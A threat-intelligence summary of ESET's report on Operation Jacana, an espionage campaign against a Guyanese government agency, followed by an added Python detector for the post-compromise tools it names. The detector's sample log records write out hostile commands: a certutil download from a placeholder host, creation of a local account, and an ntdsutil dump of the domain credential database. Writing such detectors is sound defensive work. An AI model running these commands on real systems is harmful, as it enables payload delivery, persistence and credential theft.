Espionage Campaign 'Operation Jacana' Targets Guyana Government Agency
Category: Threat Actor Activity | Industry: Government | Source: ESET
ESET researcher Fernando Tavella reports an espionage campaign, dubbed "Operation Jacana," that targeted a government agency in Guyana. The campaign was identified in February 2023 through a spearphishing email that lured the target with recent geopolitical events. While the operation is not definitively attributed to a specific APT group, ESET assesses with medium confidence that a China-aligned threat actor is responsible. Among the malware distributed in the campaign, a variant of Korplug/PlugX was discovered, supporting the attribution to a China-aligned actor. Tavella points out that China has an economic interest in Guyana, driven by the Belt and Road Initiative, a global infrastructure development project launched by China to foster economic partnerships and connectivity across many countries.
Spearphishing emails with subjects related to Guyanese public affairs were used to lure victims, with links leading to a ZIP file hosted on a Vietnamese governmental website. Once the victim extracted the ZIP file and launched the executable it contained, a new C++ backdoor tracked as "DinodasRAT" infected the system. The name derives from its command-and-control (C2) configuration string, which always begins with "Din." This multifaceted malware can exfiltrate files, capture screenshots, manipulate the Windows registry, execute commands, and more.
After the initial compromise, the threat actors moved laterally within the victim's network using tools such as Impacket. They ran various commands, including certutil to download files, account creation to establish persistence, and ntdsutil.exe to extract credentials. DinodasRAT, with its unique capabilities, played a central role in the espionage campaign, enabling the attackers to operate stealthily alongside additional malware, namely Korplug and a SoftEther VPN client. While lateral movement, malware deployment, and C2 activity were reported, the impact of the Operation Jacana campaign is unknown, including whether the attackers were able to exfiltrate data from the compromised government entity.
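The three post-compromise behaviours named above (certutil downloads, account creation for persistence, and ntdsutil.exe credential extraction) are the kind of living-off-the-land activity a defender can hunt for in process-creation telemetry. The following detector is an added example, not code from ESET or the report; the record format, host names, paths and URLs are constructed, and the command-line flags it matches on are assumptions drawn from the tools' documented usage rather than from the report.

```python
"""Toy detector for the post-compromise tooling named in the Operation Jacana
report: certutil downloads, account creation for persistence, and ntdsutil.exe
credential extraction. Flags are assumptions from the tools' documented usage."""
import re
from typing import Dict, List, Tuple

# Rule: (name, expected image basename, regexes that must all match the command line)
RULES: List[Tuple[str, str, List[str]]] = [
    ("certutil_download", "certutil.exe", [r"-urlcache", r"https?://"]),
    ("new_local_account", "net.exe", [r"\buser\b", r"/add\b"]),
    ("ntdsutil_dump", "ntdsutil.exe", [r"\bntds\b", r"\bifm\b"]),
]

def parse_record(line: str) -> Dict[str, str]:
    """Parse a constructed 'key=value|key=value' process-creation record."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def match_rules(record: Dict[str, str]) -> List[str]:
    """Return the names of all rules a single record satisfies."""
    image = record.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmdline = record.get("CommandLine", "")
    return [name for name, wanted, patterns in RULES
            if image == wanted
            and all(re.search(p, cmdline, re.IGNORECASE) for p in patterns)]

def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (Host, matched rule names) for every record that triggers a rule."""
    results = []
    for line in lines:
        rec = parse_record(line)
        hits = match_rules(rec)
        if hits:
            results.append((rec.get("Host", "?"), hits))
    return results

# Constructed sample records; hosts, paths and URLs are placeholders, not report IoCs.
SAMPLE_LOG = [
    "Host=WS01|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -split -f http://example.invalid/a.zip C:\\Users\\Public\\a.zip",
    "Host=WS01|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -verify C:\\temp\\cert.cer",
    "Host=DC01|Image=C:\\Windows\\System32\\net.exe|CommandLine=net user svc_backup P@ss /add",
    "Host=DC01|Image=C:\\Windows\\System32\\ntdsutil.exe|CommandLine=ntdsutil \"ac i ntds\" ifm \"create full C:\\temp\\x\" q q",
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_LOG):
        print(host, ", ".join(hits))
```

The second certutil record (a benign certificate verification) is deliberately included to show that the rule keys on the download flags rather than on the binary name alone.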